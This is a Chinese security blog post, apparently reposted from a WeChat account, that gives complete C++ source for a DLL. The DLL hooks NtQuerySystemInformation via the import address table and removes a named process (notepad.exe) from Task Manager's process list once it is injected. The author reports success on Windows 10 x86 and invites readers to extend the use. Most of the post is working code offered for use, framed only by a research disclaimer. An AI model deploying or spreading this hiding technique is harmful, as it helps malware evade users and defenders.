进程管理器中隐藏进程

admin
admin
admin
138858
文章
114
评论
2021年11月6日08:23:57评论72 views字数 3553阅读11分50秒阅读模式

之前测试过在进程管理器中隐藏进程的方法,现把代码公开:


#define _CRT_SECURE_NO_WARNINGS
#include<Windows.h>#include<Psapi.h>#include<TlHelp32.h>#include<stdio.h>#include<stdlib.h>#include<winternl.h>#include<ntstatus.h>#include<winnt.h>
using namespace std;
typedef struct _MY_SYSTEM_PROCESS_INFORMATION{    ULONG NextEntryOffset;    ULONG NumberOfThreads;    LARGE_INTEGER Reserved[3];    LARGE_INTEGER CreateTime;    LARGE_INTEGER UserTime;    LARGE_INTEGER KernelTime;    UNICODE_STRING ImageName;    ULONG BasePriority;    HANDLE ProcessId;    HANDLE InheritedFromProcessId;} MY_SYSTEM_PROCESS_INFORMATION, * PMY_SYSTEM_PROCESS_INFORMATION;
typedef NTSTATUS(WINAPI* PNT_QUERY_SYSTEM_INFORMATION)(    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,    __inout PVOID SystemInformation,    __in ULONG SystemInformationLength,    __out_opt PULONG ReturnLength    );
PNT_QUERY_SYSTEM_INFORMATION OriginalNtQuerySystemInformation =(PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll"),    "NtQuerySystemInformation");

NTSTATUS WINAPI HookedNtQuerySystemInformation(    __in       SYSTEM_INFORMATION_CLASS SystemInformationClass,    __inout    PVOID                    SystemInformation,    __in       ULONG                    SystemInformationLength,    __out_opt  PULONG                   ReturnLength){    NTSTATUS status = OriginalNtQuerySystemInformation(SystemInformationClass,        SystemInformation,        SystemInformationLength,        ReturnLength);    if (SystemProcessInformation == SystemInformationClass && STATUS_SUCCESS == status)    {                PMY_SYSTEM_PROCESS_INFORMATION pCurrent = NULL;        PMY_SYSTEM_PROCESS_INFORMATION pNext = (PMY_SYSTEM_PROCESS_INFORMATION)            SystemInformation;
        do        {            pCurrent = pNext;            pNext = (PMY_SYSTEM_PROCESS_INFORMATION)((PUCHAR)pCurrent + pCurrent->                NextEntryOffset);            if (!wcsncmp(pNext->ImageName.Buffer, L"notepad.exe", pNext->ImageName.Length))            {                if (!pNext->NextEntryOffset)                {                    pCurrent->NextEntryOffset = 0;                }                else                {                    pCurrent->NextEntryOffset += pNext->NextEntryOffset;                }                pNext = pCurrent;            }        } while (pCurrent->NextEntryOffset != 0);    }    return status;}
void StartHook() {    MODULEINFO modInfo = { 0 };    HMODULE hModule = GetModuleHandle(0);
        GetModuleInformation(GetCurrentProcess(), hModule, &modInfo, sizeof(MODULEINFO));
    char szAddress[64];
        LPBYTE pAddress = (LPBYTE)modInfo.lpBaseOfDll;    PIMAGE_DOS_HEADER pIDH = (PIMAGE_DOS_HEADER)pAddress;
    PIMAGE_NT_HEADERS pINH = (PIMAGE_NT_HEADERS)(pAddress + pIDH->e_lfanew);    PIMAGE_OPTIONAL_HEADER pIOH = (PIMAGE_OPTIONAL_HEADER) & (pINH->OptionalHeader);    PIMAGE_IMPORT_DESCRIPTOR pIID = (PIMAGE_IMPORT_DESCRIPTOR)(pAddress + pIOH->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
        for (; pIID->Characteristics; pIID++) {        if (!strcmp("ntdll.dll", (char*)(pAddress + pIID->Name)))            break;    }
        PIMAGE_THUNK_DATA pITD = (PIMAGE_THUNK_DATA)(pAddress + pIID->OriginalFirstThunk);    PIMAGE_THUNK_DATA pFirstThunkTest = (PIMAGE_THUNK_DATA)((pAddress + pIID->FirstThunk));    PIMAGE_IMPORT_BY_NAME pIIBM;
    for (; !(pITD->u1.Ordinal & IMAGE_ORDINAL_FLAG) && pITD->u1.AddressOfData; pITD++) {        pIIBM = (PIMAGE_IMPORT_BY_NAME)(pAddress + pITD->u1.AddressOfData);        if (!strcmp("NtQuerySystemInformation", (char*)(pIIBM->Name)))            break;        pFirstThunkTest++;    }
      DWORD dwOld = NULL;    VirtualProtect((LPVOID) & (pFirstThunkTest->u1.Function), sizeof(DWORD), PAGE_READWRITE, &dwOld);    pFirstThunkTest->u1.Function = (DWORD)HookedNtQuerySystemInformation;    VirtualProtect((LPVOID) & (pFirstThunkTest->u1.Function), sizeof(DWORD), dwOld, NULL);
    sprintf(szAddress, "%s 0x%X", (char*)(pIIBM->Name), pFirstThunkTest->u1.Function);
    if (pIDH->e_magic == IMAGE_DOS_SIGNATURE)        MessageBox(NULL, szAddress, "TEST", MB_OK);    else        MessageBox(NULL, "FAIL", "FAIL", MB_OK);
    CloseHandle(hModule);}
bool __stdcall DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved){    switch (dwReason)    {    case DLL_PROCESS_ATTACH:        StartHook();        break;    }    return TRUE;}


将其注入到进程管理器进程中,即可隐藏指定进程,当然在tasklist中依旧存在,win10 x86测试成功。用途可自行扩展。


     ▼
更多精彩推荐,请关注我们

进程管理器中隐藏进程



本文始发于微信公众号(鸿鹄实验室):进程管理器中隐藏进程

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月6日08:23:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   进程管理器中隐藏进程https://cn-sec.com/archives/406717.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息